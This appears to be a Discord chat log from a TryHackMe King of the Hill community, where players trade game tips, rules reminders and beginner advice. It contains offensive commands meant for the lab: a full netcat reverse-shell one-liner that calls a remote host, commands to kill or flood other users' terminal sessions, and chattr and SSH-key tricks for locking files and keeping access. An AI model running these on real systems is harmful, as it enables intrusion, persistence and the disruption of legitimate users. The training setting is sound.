1 sec
#koth
fair adder
create account and upload an image
fair adder
go ahead but i wasn't talking about that
click on the image you uploaded and take a look to the url
vital tide
oh mbmb
vital tide
this seems kinda hartd
im running some scans and enumeration stuff still
wait
the url when you upload the image
isnt that just your local directories
damn
fair adder
isnt that just your local directories
the directory name is your name
you canc hange your name
vital tide
oh hmmmmmmmmmm
fair adder
go to /profiles
if you have an account
there you can change your name
but use burp
vital tide
1 sec
wait what
I went to the profiles directory
its not there-
nothings there*
fair adder
have you created an account?
fair adder
hmm
fair adder
hmm thats wird
fair adder
i have rce
vital tide
what was it
fair adder
i was getting logged out everytime
fair adder
i mean this was all web tho
fair adder
what was it
i will dm to you
vital tide
true but for KOTH there are multiple ways right?
vital tide
i will dm to you
okok
nova tide
@fair adder no spoilers please? π
fair adder
<@456226577798135808> no spoilers please? π
sorry
autumn epoch
Sudo apt-get install RTX_3090
fair adder
lilac basin
gg Bl4ckC4t
fair adder
gg
lilac basin
gg
fair adder
you have the 8 flag, I have 1
lilac basin
can't you find them?
fair adder
I'm lost, I don't really like windows machines
fair adder
I did that, but there are many folders, it will take a while until I get used to these windowsπ€£ π€£ π€£
lilac basin
it is like this in every machine
lilac basin
I did that, but there are many folders, it will take a while until I get used to...
ahahhaah it takes few minutes
fair adder
The good thing about koth is that I always learn something new, something very useful, I love these challenges
fair adder
same
fair adder
sour zealot
Can someone tell me how to privesc on the H1: easy machine. I know it's very easy but for some reason I just can't figure it out.
Ok thx
fair adder
And there are writeups available for those rooms...
Another thing I would like to suggest you a room if you haven't done yet:
Common Linux Priv Esc
sour zealot
I will thx
frail ridge
Does anyone have a hint for H1 hard?
fair adder
Does anyone have a hint for H1 hard?
maybe abit late but i found port 80 to be the easiest one; make sure to run your directory enumeration tool of choice on it and pay attention to what you find
most specifically what it accepts
stiff egret
Can someone tell me how to privesc on the H1: easy machine. I know it's very eas...
As much as I'd like to help, we really avoid giving out spoilers for KoTH machines, it's not like there aren't write-ups available. Just can't put the spoilers here.
(Same goes for @Neophyte#9160, I get it you were trying to help, but please avoid KoTH spoilers in chat. )
@fair adder
frail ridge
maybe abit late but i found port 80 to be the easiest one; make sure to run your...
can you be more specific?
shadow pivot
https://tryhackme.com/games/koth/join/6985a620ccb97f0b15566096 everybody can join
20 min
sour zealot
lilac basin
yep
worldly karma
do u have any docs on this? because i really cant understand why it'll work if i inject php code to the body of this GET request
worldly karma
yeah but why php executes the HTTP_USER_AGENT
nova tide
@worldly karma i would suggest you to stop spoiling the whole box?
worldly karma
ok.. we are only talkin about LFI but ok
nova tide
i have deleted your messages. Please refrain from posting the whole commands/urls on how to exploit the box.
worldly karma
when i pasted the url i changed the names
lilac basin
yeah but why php executes the HTTP_USER_AGENT
research
worldly karma
yeh will do
stiff egret
LeTs PlAy! KiNg oF ThE HiLL
https://tryhackme.com/games/koth/join/3133bc34f3d04e6c9f3d9833
Random Public, Starting in 23 mins!
brittle obsidian
hey everyone! Would someone like to give me an idea on patching vulnerabilities to maintain the access......I mean I've only been exposed to attacking stuff so far.
Are there rooms where I can practice the same?
brittle obsidian
IIRC there is a blue team path on tryhackme.
yeah got it sir! Thanks for your assistanceππ» π―
sour vectorBOT
Gave +1 Rep to @stiff egret
stiff egret
no need of 'sir' :)
brittle obsidian
sure:) Moreover, would it make sense to participate with no prior knowledge of defense?
stiff egret
Yeah, why not, although it is preferred that you have some idea about how defending works, but you can go on without it as well, and learn along the way.
I'd recommend watching John Hammond's or Optional's videos on King of the hill to get some basic ideas about defending and attacking before you start tho.
brittle obsidian
Yeah sure! Great recommendations thoughπ― ππ»
stiff egret
For King of the Hill, IIRC alt accounts are also allowed, so you can create another account and make a game with 2 of your accounts. And practice stuff.
( @terse willow Alts are allowed right? )
brittle obsidian
For King of the Hill, IIRC alt accounts are also allowed, so you can create anot...
that seems interestingπ
quiet schooner
I don't think they are allowed if you're using 'em to control resets
stiff egret
yeah, that was an issue with them
quiet schooner
There's also KoTH Food and Hackers available as standalones on THM for practice
brittle obsidian
There's also KoTH Food and Hackers available as standalones on THM for practice
got it sir!ππ»
stiff egret
I don't think they are allowed if you're using 'em to control resets
oh, I think that was for cases in public matches, in private matches using alts should be fine I think π€
brittle obsidian
btw from which level one is considered as intermediate?
stiff egret
Is it not letting you play because only intermediate players are allowed?
brittle obsidian
worldly karma
There's also KoTH Food and Hackers available as standalones on THM for practice
I'm searching Food in the rooms search bar and its not finding anything, whats the name?
worldly karma
lol
quiet schooner
Failing that, search NinjaJc01 and you'll find all my rooms
worldly karma
maybe someone can send a direct link?
quiet schooner
Want a little practice at KoTH?
Don't want to compete with other people?
Hackers and Food are public as standalone rooms so that you can practice them alone.
https://tryhackme.com/room/kothfoodctf
https://tryhackme.com/room/kothhackers
ree
stiff egret
time to tag horshark 
worldly karma
"Problem finding room..
"
quiet schooner
Ok now you can thank me. Link was wrong
worldly karma
yeah noticed that LOL
stiff egret
quiet schooner
There's a link to both of them now
worldly karma
oh ok
quiet schooner
Gosh, I need to improve those descriptions
candid spade
One silly question since i'm new to CTF challenges. So i have the IP what to do with it i can't access it or ping it.. please let me know the step to access i will do further steps on my own.....
stiff egret
One silly question since i'm new to CTF challenges. So i have the IP what to do ...
Not to demotivate you or anything, but if you are very new to all this, then I'd say start with easy rooms on tryhackme first, and not go head on to KoTH
lilac basin
One silly question since i'm new to CTF challenges. So i have the IP what to do ...
bruh you can't run if you don't know how to walk
candid spade
Ok will check the basic room first..thanks for the info.
stiff egret
https://tryhackme.com/room/tutorial
Maybe start with this
candid spade
Ok
terse willow
For King of the Hill, IIRC alt accounts are also allowed, so you can create anot...
Uhhhhhh
I actually can't remember what was decided there
worldly karma
so my metasploit session dies instantly when i connect to it through nc and ive seen john hammond do something in one of his videos that immediately opens a meterpreter session which fixed his problem. any ideas what it was?
stiff egret
uh... what?
worldly karma
lol
ok
im having a multihandler listener running and im connecting to it from the attacker machine using nc and the session always dies
stiff egret
Oh oookkkk, no idea why. π You can always use regular reverse shells. π€·ββοΈ
worldly karma
it happened when i used regular reverse shells too
its something that happened to John hammond in one of his videos and he fixed it by doing something in metasploit
LOL
stiff egret
In THAT case, it usually depends on the reverse shell you used, the most stable IMO is mkfifo one,
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
stiff egret
its something that happened to John hammond in one of his videos and he fixed it...
again, no idea about that. π
worldly karma
ok ill try running that from the target machine
stiff egret
ATB
worldly karma
```rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f``...
yay
it works
thank you!
stiff egret
NP
worldly karma
----r--r-- 1 bob bob 38 Mar 28 2020 log
although im bob, cant read the file. google'd some and i found out the there must be something to do with ACL but i checked it and its fine for bob
brittle obsidian
yeah, you can try that in your own terminal...current permissions are 044....
worldly karma
User, group, other
yeah so if im reading this right the r is in group
quiet schooner
In group and other, yes
worldly karma
yeah, you can try that in your own terminal...current permissions are 044....
isnt it Nothing for user, read for group and read for public?
brittle obsidian
isnt it Nothing for user, read for group and read for public?
yeah exactly
brittle obsidian
if he is part of the group
is he? @quiet schooner might answer this well then......
worldly karma
wait, maybe i just forgot all of what i learned about linux file permissiobns
worldly karma
----r--r-- 1 bob bob 38 Mar 28 2020 log
although im bob, cant read the file. go...
what is the second bob mean here
isnt it owner bob, group bob
?
quiet schooner
Yes
brittle obsidian
he is
worldly karma
so bob is indeed part of the group
why i cant read π¦
cat: log: Permission denied
π
quiet schooner
Probably because Owner is more specific so it'd take priority?
worldly karma
Owner is bob too
fair adder
How about if you are Bob change the perms of fileπ
worldly karma
chmod: changing permissions of 'log': Operation not permitted
guys maybe someone did this room? Its KothFood
quiet schooner
Owner is bob too
Yeah. But the owner cannot read.
quiet schooner
guys maybe someone did this room? Its KothFood
I made the room
worldly karma
Yeah. But the owner cannot read.
is that a thing?
so in order to read the file i need to be someone who is not bob?
brittle obsidian
is that a thing?
yeah, that's what happening here #koth message
quiet schooner
I don't remember but probably?
I don't actually remember having a user called bob. They were all food themed.
worldly karma
yeah, that's what happening here https://discord.com/channels/521382216299839518...
yeah but u could change the perms
worldly karma
I don't remember but probably?
I don't actually remember having a user called bo...
i changed it
for the question
fair adder
so in order to read the file i need to be someone who is not bob?
Yes he can be someone or should be in Bob's group
worldly karma
gotcha
worldly karma
I don't remember but probably?
I don't actually remember having a user called bo...
yeah im talking about bread
quiet schooner
I'll check my writeups for it
fair adder
HardStoN so you added your own user named Bob?
worldly karma
HardStoN so you added your own user named Bob?
no no, i just changed it to not spoil something for someone
quiet schooner
That "log" file doesn't appear in my writeup
quiet schooner
Then yeah. You'll probably want to be a different user. Or root.
worldly karma
Then yeah. You'll probably want to be a different user. Or root.
ill try that
remote wasp
brittle obsidian
```rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f``...
hey, although I've got shell 2 times both in case of cron jobs for privesc using these commands but still I am having a hard time to understand it after cat /tmp/f
since, I've come across mkfifo command for the first time. All I know is that it makes a named pipe which needs to be connected on 2 sides where one end should be reading and other should be writing and vice-versa. So it means there will be no output after cat /tmp/f since it's not connected on the other side.
so my question is then how does using | and the further command playing their role here?
brittle obsidian
https://askubuntu.com/questions/1127431/how-does-this-command-work-reverse-shell
hey, thanks for replying!ππ» I'll just go through this thread.
sour vectorBOT
Gave +1 Rep to @solid patrol
elfin coral
i am new at koth and i have a question, is it allowed to change the ssh key for users so if anyone find the id_rsa key he could not connect to the machine
elfin coral
whats the best way to find flags? just cd cross all directories and search or any commands like grep?
fair adder
manually read every file in the system
sour zealot
whats the best way to find flags? just cd cross all directories and search or an...
you can use the "find" command. For example: find / -type f -name "flag*.txt" This will search the entire system for files with that name.
the "*" means its can also be something like flag7.txt
livid anvil
@lilac basin good fight!
lilac basin
Gg
livid anvil
thats the first time i got to root on shrek
errant marten
thats the first time i got to root on shrek
nc π
lilac basin
please don't reset the machine randomly
@fair adder
guys what can i do if we are 2 in koth and the other player restart the machine every 5 minutes
white wolf
you ask them to stop? :P
fair adder
Hello guys, I was playing koth, and when I put my name in /root/king.txt, it returned a permission denied error, how can I leave the file like this? even for root?
lilac basin
Hello guys, I was playing koth, and when I put my name in /root/king.txt, it ret...
study
dont restart the machine
fair adder
You were stopping the ssh service .-.
fair adder
When I got root on the machine, in less than 30s I was expelled from ssh, and I was unable to reconnect
lilac basin
enumerate
lilac basin
gg
fair adder
n0n1m0us
- Try sending a screenshot, also it looks like your machine not the koth machine?
- Mention koth-staff for issues regarding koth not the THM staff.
- If you believe someone is breaking the rules, reports go to
koth@tryhackme.com
Ignore the 1st and 2nd point
I just copy pasted this msg from Naughty
lilac basin
ty now he stopped from restarting the machine
so if he restart it again i will report
fair adder
I quit the game because I couldn't play, since the ssh service was unavailable when I tried to connect
livid anvil
what do you mean it was unavailable?
@fair adder
is there something wrong with koth?
i cant get to the game. and i cant leave because of that.
fair adder
The ssh was being stopped and I was unable to access the machine through the ssh service
livid anvil
what was it saying when you tried to connect?
fair adder
yes
livid anvil
thats not an answer to that question
nova tide
I quit the game because I couldn't play, since the ssh service was unavailable w...
Try running the nmap scan again, people tend to change the port. Moreover try reading about the chattr binary.
Also it's not against the rules but totally ruins the purpose of KoTH to spam reset just because the only way you know is patched. There are multiple ways in for foothold and to root.
fair adder
I connected to ssh to explore the machine (tyler) and after a while, the connection was closed, and when I tried to reconnect, it returned this "connection refused" error
livid anvil
then the port was probably changed
livid anvil
i know that. im in but i cant use the find command. its not found for some reason
remote wasp
i know that. im in but i cant use the find command. its not found for some reaso...
have more ways to find suid binaries
fair adder
helo π£
livid anvil
have more ways to find suid binaries
lol. thats fair
remote wasp
π£
terse willow
π
remote wasp
uneven forge
someone really played with this guys emotions changing the ssh port lol
elfin charm
a3881fbad643c2a7cb83850c
remote wasp
lilac basin
@misty jungle don't give up
don't give up doesn't mean RESET THE MACHINE @misty jungle
livid anvil
@lilac basin did you harden the hell outta that?
lilac basin
maybe
livid anvil
i may have found a way but i couldnt get to it before the end. lol.
lilac basin
i always leave vulns for the initial access. But the hardest thing is to get root
livid anvil
yeah
stiff egret
If anyone plays after about half an hour or so, ping me too :)
Gonna make a coffee so strong that'll beat redbull.
lilac basin
i'm here
regal notch
is the new room up ? jellyfish ?
blissful kettle
Not yet
stiff egret
Really not the place to ask for it tho.
blissful kettle
there's a pin in #834378315505598464
regal notch
Really not the place to ask for it tho.
totally forgot this was koth
stiff egret
lol NP
sour zealot
stiff egret
@lilac basin Hop in if you are still about :)
lilac basin
send the link
stiff egret
https://tryhackme.com/games/koth/join/8f6946b40b0ef5f3c668dd9a (7min)
^^
(Let's hope it's not windows 
)
sour zealot
same
stiff egret
ncie
sour zealot
I ruined everything for my self. I forgot the password and my shells keep breaking
lilac basin
is good to change password?
sour zealot
I think as long as its still possible to get root its ok.
lilac basin
but if you do you will break the access
stiff egret
is good to change password?
Changing passwords is obv allowed, as it's the part of most basic patching. But a good move would be to leave some other albeit hard ways to get in the machine intact.
It's not a fight if there is no one in the ring.
Really? A reset? smh, **Please only reset the machine if it is broken!**I can only say this so many times.
livid anvil
@stiff egret @lilac basin @sour zealot let me know when you guys make a new game. i might hop on
stiff egret
Sure!
worldly karma
Do u guys like really talk sometimes in the voice chat here while playing koth?
stiff egret
sometimes
usually it's just people oohing and aahing when someone kills their shells π
worldly karma
Wdym killing their shells?? Like resetting the machine?
stiff egret
naah, killing their shells as in killing the PID of shells
fair adder
helo π£
worldly karma
Guys does someone here work as a pentester IRL
worldly karma
naah, killing their shells as in killing the PID of shells
Well thats mean lol
stiff egret
ps aux | grep pts see the PID of shell someone is on, then kill -9 PID
and there will be shouting on the other side of mic
π
stiff egret
quality content guaranteed
worldly karma
Indeee
worldly karma
Guys does someone here work as a pentester IRL
?
fair adder
why kill shells if you cna run nyancat on their ttys
stiff egret
why kill shells if you cna run nyancat on their ttys
when they don't have ttys
worldly karma
So my question is, do u guys like rly feel that these ctf's are like the real world
stiff egret
although I, too, prefer nyancat over killing shells
worldly karma
?
fair adder
no
stiff egret
I'd say if you ask that question in #general , you'll get way more responses and way more reasons
worldly karma
Aight
stiff egret
So my question is, do u guys like rly feel that these ctf's are like the real wo...
although, I've seen admin:password irl scenarios. ALOT
worldly karma
I mean, i wasnt talking about these stuff when i said ctf's, i was talking about like medium-hard rooms
stiff egret
reallly depends on the rooms.
fair adder
more 'puzzle style' focused
there's one machine on htb tho
easy one
which is pretty realistic
but i dont remember the name
fair adder
which is pretty realistic
foothold
fair adder
but i dont remember the name
delivery i think
worldly karma
An easy machine that is irl?
sour zealot
can someone link a write up about H1: easy. I can't figure out the privesc.
stiff egret
Sorry, you have to google that around, posting spoilers in this chat is not allowed. :)
sour zealot
I know but I can't find any write ups online. So i hoped someone could send me a link.
elfin coral
i cant find any writeup also
elfin coral
i put my name in king.txt but it doesnt work
elfin coral
i am root and i want to edit king.txt but their is a error "Operation not permitted" i am root why i cant change it?
livid anvil
how are you exiting vim?
livid anvil
on vim?
elfin coral
its not the editor i get the error with echo > king.txt
livid anvil
do you get any other info
elfin coral
no only "Operation not permitted"
room is over i hope i dont get this error next time too
fair adder
i am root and i want to edit king.txt but their is a error "Operation not permit...
I was studying about it, I think the file is locked, to unlock it, try the following:
chattr -i /root/king.txt
chmod 777 /root/king.txt
chattr and chmod are to remove or give permissions, if it doesn't work, i don't know how to help :(
fair adder
XD
livid anvil
so to answer the question. someone who got there first probably had the file locked or opened. to unlock it you may have to boot others off first
fair adder
do lsattr king.txt
if it has attribute i, that means you can't change/delete the file
if it has attribute a
that means you can only append to it when writing
not overwrite what's already in it
generally you will want to do chattr +ai king.txt after putting your name in it and moving the chattr binary to another location with another name
so if you lose root others will need to waste some time uploading their own static chattr binary to the machine
I'm not sure if chattr is the only binary you're permitted to hide from others / delete
I've played with some people who hid ps/kill/pkill/etc, pretty useful aswell (if it's permitted ofc)
fair adder
elfin coral
who restart the machine all the time
fair adder
smol pp people
anyway i don't think people often get punished for not following the koth rules
elfin coral
i didnt restart it it was the other two
elfin coral
one question when getting root and want to patch the vuln like here the ip with the suid permissions what should i do because changing permission is not allowed
fair adder
but if the guy's fun is reseting the machine until he's the first one to perform the steps he has performed a million times before then what can i say
elfin coral
fair adder
one question when getting root and want to patch the vuln like here the ip with ...
if you ran lsattr on it you would see it has i attribute
which means immutable
so you remove it from it
elfin coral
ah
fair adder
and then you can change the permissions
elfin coral
okey thank u very much
weary swan
karmic light
bleak briar
@karmic light you need to give us the join link not the spectate link
If you want us to join
lilac basin
@jolly briar don't remove flags
stiff egret
Check pins
lilac basin
gg @rocky cradleslowyo
fair adder
anyone playing rn?
I'm up for a game if 5+ people
and no emotional resets :)
π£
elfin coral
how should i search flags? i only can find 4 flags from 7 at hogwarts machine π¦
stiff egret
Just look at every file in general directories.
fair adder
how should i search flags? i only can find 4 flags from 7 at hogwarts machine π¦
grep -r "THM{" /path 2>/dev/null
flags you can use:
--exclude-dir
-I (excludes binaries)
lilac basin
someone for king of the hill
lilac basin
You are in a koth with me
And I canβt see the machine ip
So I want to know if itβs the same for you
stiff egret
is it still the case? or you can see the IP now?
stiff egret
Thanks for reporting, pinged higher admins. This is getting looked into. Probably something to do with the overall site upgrades thats been going on recently.
jolly briar
i got that error too but refreshing the page solved it
errant marten
stray oasis
i even couldnt load the main page
livid anvil
i though it was just me. guess someone was hitting it really hard
fair adder
https://tryhackme.com/games/koth/join/85e23c1e882d0d12a0d23f12
wow i joined at the end π¦
but no one has king yet wtf
lilac basin
yep
livid anvil
how is no one king yet?
fair adder
unless it's bugged for me
livid anvil
no one is king
fair adder
fair adder
try this one https://tryhackme.com/games/koth/join/7237b5be6ea456e07fdcd45b @livid anvil
livid anvil
i just dont know windows yet
fair adder
the foothold in this machine is pretty cool
at least the method i know
starts in 13 mins
am gonna join you blvckmetxl
cool :))
btw how to broadcast any message?
wall "message"
Thanks
are u 'bhavesh'?
Yes
It's my first gane and idk how to defend
game*
most important is persistence
adding backdoors, etc
after that fix regular stuff
suids, change passwords...
sudoers, capabilities
am gonna try my best but if it's hoth hard or any windows i'll try to get shell first
i want h1: hard
the best koth machine
or space jam π
food
something wrong with the machine?
I guess yes
i tried 2 ways but Exit status
error
did someone patched so quickly?
i dont think so
i think we should reset
it's broken i think
root is pretty easy once you're in
and no one is root yet
oh nvm then
What's going on?
fair adder
no one
livid anvil
@short loom did you kill the http server?
fair adder
it's good
i don't think there's a http server in this machine
this machine is pretty boring ;s
livid anvil
you sure
fair adder
it's just a matter of who gets in as ramen and changes password first xd
livid anvil
well thats stupid
fair adder
that's why i said i wanted space jam
livid anvil
theres no ssh?
fair adder
there is ssh
ports are changed
idk what he did to http server and 2 more ways to get in
livid anvil
fair adder
i got in as food but i can't do anything
fair adder
i got in as food but i can't do anything
wdym can't do anything?
rbash?
or he messed the filesystem?
no command is found
and he changed the port once again
what command?
if he's messing up the filesystem that is agaisnt the rules
-bash: whoami: No such file or directory
ok so he messed up the filesystem :))
just report then :))
I really don't know what he actually did
like i found 3/4 ways to get in but none of them worked
fair adder
-bash: whoami: No such file or directory
i got in then i found this
i think i know who he is, he always does this stuff
just report
probably got banned on his other acc
he compresses the system binaries and delete them
or smth like that
idk honestly
good luck playing after this
It was a bad/learning experience for me
ye
that's the reason i kinda stopped playing koth
there's people who do this kind of stuff
ant there's the people who vote reset for no reason
they don't even try, they just vote reset
livid anvil
reset so we can get on
livid anvil
yeah. and he deleted everything
fair adder
Okay i'll do reset
livid anvil
yeah this room is stupid
fair adder
@lilac basin can i dm>
lilac basin
yep
nova tide
-bash: whoami: No such file or directory
That's intended
fair adder
Okok Thanks
slim lake
white grail
anyone wanna do a KOTH
errant marten
Hey, how do you add your ssh pub-key to authorized_keys? Like i have tried to do it in koth games but it never work :/
errant marten
yee ik
lilac basin
then "cat id_rsa.pub > authorized_keys"
obv you have to copy-paste or wget the id_rsa.pub file in the victim machine
errant marten
yee ik, but after all that i still cant ssh in...
lilac basin
did you check the ssh config file?
errant marten
uh, not really.
@lilac basin Nvm I just found a blog that explains how to use it and everything. Thanks for the help anyways π
sour vectorBOT
Gave +1 Rep to @lilac basin
lilac basin
np
unreal jasper
koth anyone?
nova tide
If you have an issue regarding KoTH kindly try to ping KoTH staff instead of other staff members as they are the ones supposed to handle that. Koth staff members are:
Naughty
Mr.Holmes
myDonut
Other than that complains go to koth@tryhackme.com
terse willow
(Probably better not pinging CMN for it @nova tide)
nova tide
(Probably better not pinging CMN for it <@!267010557889085440>)
I was doubting on that one too but he had koth staff role as well so wrote his name at the end π
terse willow
Yeah -- poor guy has enough on his plate just now π
livid anvil
livid anvil
who keeps reseting the machine?
livid anvil
i was so close... then i fucked up my shell.....
lilac basin
you didn't enumerate well
livid anvil
well i think i ran something that locked up www-data by accident. at least going through php
fair adder
:
errant marten
GGwp @grim narwhal
wary jolt
.
fair adder
@wary jolt koth?
fair adder
@nova tide you won't be Streaming? Koth?
fair adder
superhero is streaming so i think that would be enough
Yep I am watching that
fair adder
I haven't played a koth... don't wanna get stomped by you
livid ginkgo
KOTH live now on superhero1's dicsord
[15:20]
superhero1 island
[15:20]
anyone can join the game
lilac basin
share the link
fair adder
@livid ginkgo @nova tide doubt solving session please
nova tide
<@636637665630093353> <@267010557889085440> doubt solving session please
yeah?
you weren't able to change the password for root because of me
nova tide
But someone showed up with nyancat
that would be me
ebon kiln
in 8 min
livid ginkgo
yeah - i didnt patch anything
i was looking for flags because once youre on and have chattr thats it its hard to combat
it becomes a race condition
I also didnt want to play dirty @fair adder by kicking anyone out
The only thing I did was echo stuff to terminals
nova tide
urandom ^
fair adder
Sorry was my first time
livid ginkgo
its ok
thats why i didnt patch or play dirty - we were there to learn on stream π
fair adder
And why was authorized_keys was not writable? Again chattr?
nova tide
yup
fair adder
thats why i didnt patch or play dirty - we were there to learn on stream π
I won't be killing shells from today
fair adder
And I only kicked once ...and it was superhero randomly
livid ginkgo
xD
livid ginkgo
Thanks @fair adder !
sour vectorBOT
Gave +1 Rep to @lapis linden
deep crag
https://tryhackme.com/games/koth/join/250f2398c4886543d69981be starting in 20 everyone invited
gray widget
sour zealot
vast kite
sour zealot
gg
errant marten
very fun game
sour zealot
yeah it was
sour zealot
i had my chattr in /tmp
errant marten
bro, i tried to find it with "FIND" command
sour zealot
i named it something random so i hoped you wouldn't find it
sour zealot
yeah I know. I deleted it a few times but forgot about it later
vast kite
@lilac basin cmg for u huh π€£
lilac basin
?
vast kite
nothing , gg
lilac basin
oh bruh i left the machine
vast kite
oh bruh i left the machine
and u still the winner 
lilac basin
vast kite
lol
lilac basin
sorry
lilac basin
flags are mine lifeboat
sour zealot
vast kite
is it okay to remove a user from sudoers file @lilac basin
vast kite
vast kite
alright , i'm out thats weird i think it's against rules
lilac basin
alright , i'm out thats weird <:paradox:668893136789045268> i think it's agains...
nope
i did stop from giving you nyancat
try to get king
!!!!
sour zealot
I already left srry
I almost had it though
btw with which command did you make us run the nyancat program?
fair adder
<:cri:631271644287074334>
which users were playing?
prime knoll
CREAT A GAME
tribal horizon
mellow orchid
how do u play king of the hill
errant marten
how do u play king of the hill
mellow orchid
https://blog.tryhackme.com/guide-to-king-of-the-hill/
and this can be any level rite
errant marten
You need to change your profile to intermediate to play koth.
You can do it even if you are lvl 1
mellow orchid
You need to change your profile to intermediate to play koth.
oh okay , does it have any side effect on me ? and i am total beginner so i feel this might help me gain more knowledge
errant marten
I don't think it does have any side effects.
errant marten
oh okay , does it have any side effect on me ? and i am total beginner so i fee...
also be sure to read the rules before you play!
mellow orchid
also be sure to read the rules before you play!
alright i will do it now , and thanks alot man this community at each point is so helpful
sour vectorBOT
Gave +1 Rep to @errant marten
errant marten
alright i will do it now , and thanks alot man this community at each point is s...
Good luck, and most importantly have fun π
mellow orchid
Good luck, and most importantly have fun π
Thanks alot
nova tide
and this can be any level rite
You might will need to have intermediate/advanced experience level on your profile. You can change it from your profile settings.
mellow orchid
You might will need to have intermediate/advanced experience level on your profi...
thanks
sour vectorBOT
Gave +1 Rep to @nova tide
sour zealot
vast kite
wanton wren
candid geode
I like seeing how players attempt to bruteforce my ssh password.
fair adder
https://blog.tryhackme.com/guide-to-king-of-the-hill/
Thanks, LOL I've been looking for this guide @errant marten
sour vectorBOT
Gave +1 Rep to @errant marten
sour zealot
sour zealot
fair adder
@sour zealot which user did you get access from
sour zealot
rcampbell
fair adder
I hope you haven't changed your password π
sour zealot
I didn't
sour zealot
anyone got some small tips for the H1: medium machine. I can't seem to figure it out.
sour zealot
Were the hell is the king.txt in hogwarts?
is this normal?
nevermind I made the king.txt file myself and it works.
honest quiver
lol
candid geode
Were the hell is the king.txt in hogwarts?
Either someone intentionally removed it, or the machine is a little broken.
nova tide
is this normal?
yes.
Intended, you need to make a king file on your own. just like echoing your name in king.txt will make the file π€·ββοΈ
glad tangle
i've seen people get nyancat'd in koth games, how do you actually do that?
gentle hatch
i've seen people get nyancat'd in koth games, how do you actually do that?
the way i've done it just find your victims device file in /dev/pts and then just run nyancat and redirect output to the device file
you can use the w command to find the proper device files
glad tangle
wait so like
./nyancat > echo "victm pid"?
gentle hatch
not the PID, the actual device file, typically just a number like /dev/pts/3
and the echo there would break the command
test it out locally with a test account, its easy
delicate cedar
while true; do clear > /dev/pts/x; sleep 3; done
glad tangle
oooh ok, thanks
i kinda wanna practice more koth but it's kinda hard lol, so thanks for the tip
frail ridge
`while true; do clear > /dev/pts/x; sleep 3; done`
is this fair?
cant you ban yourself with this?
frail ridge
ok ok ok so its fair nice
white wolf
dont kill shells doe
frail ridge
but if instead a x i use a *
opal dove
it'll do your own
frail ridge
im not gonna blow myself?
opal dove
people play dirty af
I mean, we'd all rather people didn't play like that
but it is what it is I guess π€·ββοΈ
frail ridge
jumm ok
opal dove
im not gonna blow myself?
that's one way of putting it
frail ridge
lol ok nice xD
lilac basin
try ssh
glad tangle
ssh it's almost everytime the best way to get in
stiff egret
no rules in koth π€ͺ
There's a quote a lot of rules. Please read in the homepage before you end up breaking some.
That being said, I k you mercury (xD and I k you know the rules)
Just everyone please, it's always better to know the limits than to test them and find the hard way
Rules on the bottom of the page
vast kite
quasi mason
vast kite
is it okay to delete all flags and change servcies passwords?! π
cuz i notice that someone already did this
sour zealot
No it's not allowed to change or delete any flags or make them inaccessible. On the other hand it is allowed to change some password but there has to always be a different method to get on the box/root.
sour zealot
IDK why people keep saying there needs to be one vuln left
Read rule 2
quiet schooner
Yeah.
Where does that say you need to leave a vuln in?
There's nothing that says you need to leave at least one vuln.
fair adder
https://tryhackme.com/games/koth/join/c8bbf854b206817a4e75f56f go play KoTH guys?
lilac basin
Where does that say you need to leave a vuln in?
if you leave a vuln, a hard one, the game becomes more competitive
stiff egret
ATB @lilac basin
stiff egret
uh np
stiff egret
Interesting, did you patch the priv-esc?
stiff egret
Mhm, Nice, I am not able to priv-esc for some reason. Trying different methods now
lilac basin
i can see you in 2 container, in which one are you trying to do privesc
stiff egret
both π
lilac basin
ahahaha ok
in one of them im sure you can do privesc
dont try "/bin/bash -p"
this isnt the right way
stiff egret
at this point I have dropped the idea to get root shell, I am just trying to get my code on the machine.
lilac basin
what code
stiff egret
naah man, I found a way, but it'll take time. on the better side, this is a reallllllllly interesting way for this machine
stiff egret
yeah
lilac basin
different from the hint i gave before
stiff egret
yeah, it's very very diff
lilac basin
oh
stiff egret
No, it was a public match :)
lilac basin
i was asking cuz before the game started someone joined and then left and slso the machine was the hardest one
stiff egret
Oh, I wasn't on system when the game started. I was bummed with this machine too, but from what I just learned in last 30 minutes, I damn love this machine.
stiff egret
Can't play for a while, will join back in about 30 minutes/1 hour. Gotta rest a bit :) GG
lilac basin
okok
quiet schooner
if you leave a vuln, a hard one, the game becomes more competitive
Aint a rule tho
lilac basin
nope
fair adder
how to use a reverse shell in space jam
terse mortar
how to use a reverse shell in space jam
Someone patched out the reverse shell I was gonna use, but I snatched a flag
ggs
fair adder
i quit, because i tried fuc.... 4 diferent reverse shells
terse mortar
same, i'm guessing someone patched up the perms
stiff egret
You cannot change perms on the flag.
fair adder
no
tribal lotus
hi everyone. Can i play 2 player king of the hill mode? How i start game?
errant marten
hi everyone. Can i play 2 player king of the hill mode? How i start game?
What do you mean 2 player?
tribal lotus
What do you mean 2 player?
2 person
terse mortar
I found 3 flags on production and got king, which is nice
elfin coral
i changed the root.txt flag by mistake
how can i report the accident?
i wanted to change king.txt and changed root.txt hahaha
fair adder
That's okay if that's by mistake...just inform those who are playing with you
And reset the machine
elfin coral
how should i inform them writing dms is not allowed
stiff egret
Why remove chattr right after one use when you downloaded it ?
It will decrease the speed of code.
@fair adder
fair adder
ye i will change that later, i used to do that for some reason
also may i dm you? i have a question
stiff egret
Sure, though I am on phone, my replies are limited.
fair adder
np it's a yes/no answer type of question
stiff egret
Sure
tribal lotus
stiff egret
If you want others to join, please share the invite link and not the spectator link.
strange escarp
Any one up for KOTH gonna create one if so
strange escarp
if any one is intrested
narrow warren
Is there a chattr for windows? or
stiff egret
You should literally Google that line.
fair adder
ebon kiln
narrow warren
You should literally Google that line.
I did
It is just, how to use it and stuff
I googled it multiple times
north stag
ITs most important part is learning the best way to express what you are searching for on internet, i think
warm marlin
anyone wanna play ? https://tryhackme.com/games/koth/join/2a1f462d08a08a6ea842593f
sour zealot
fair adder
isnt it cute when people get mad and start scanning your machine?
10.10.20.168 - - [15/May/2021 19:08:33] code 501, message Unsupported method ('OPTIONS') 10.10.20.168 - - [15/May/2021 19:08:33] "OPTIONS / HTTP/1.1" 501 -
i love it
10.6.73.140 is his thm ip btw
short tusk
Reee
narrow warren
KEK
short tusk
@fair adder email this to the koth email and Iβll forward it to Skidy
fair adder
fair adder
